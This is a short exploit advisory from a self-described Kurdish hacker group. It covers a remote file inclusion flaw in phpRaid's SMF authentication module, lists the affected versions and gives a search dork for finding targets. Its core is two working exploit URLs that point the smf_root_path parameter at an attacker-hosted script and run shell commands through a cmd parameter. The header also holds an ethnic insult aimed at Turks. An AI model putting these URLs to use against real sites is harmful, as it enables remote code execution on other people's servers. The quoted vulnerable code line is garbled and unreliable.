# Kurdish Security Advisory # phpRaid Remote File Include [SMF] :} # "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan # Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org # Risk : High # Class : Remote # Script : phpRaid # Script Website : http://www.spiffyjr.com # Version : phpRaid v2.9.5 " v3.0.b1 " v3.0.b2 " v3.0.b3 # Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D # Special Bastard : Turkish Lame # w0rkz : "phpRaid" "inurl:"phpRaid" etc. :) --------------------------------------------------------------------- # cmd shell example: # cmd shell variable: ($_GET[cmd]); Vulnerable code : Now SMF portal code :) // includes include($smf_root_path= . 'SSI.php'); ----------------------------------------------------------------------- http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www.yourcode.com/x.txt?&cmd=id http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a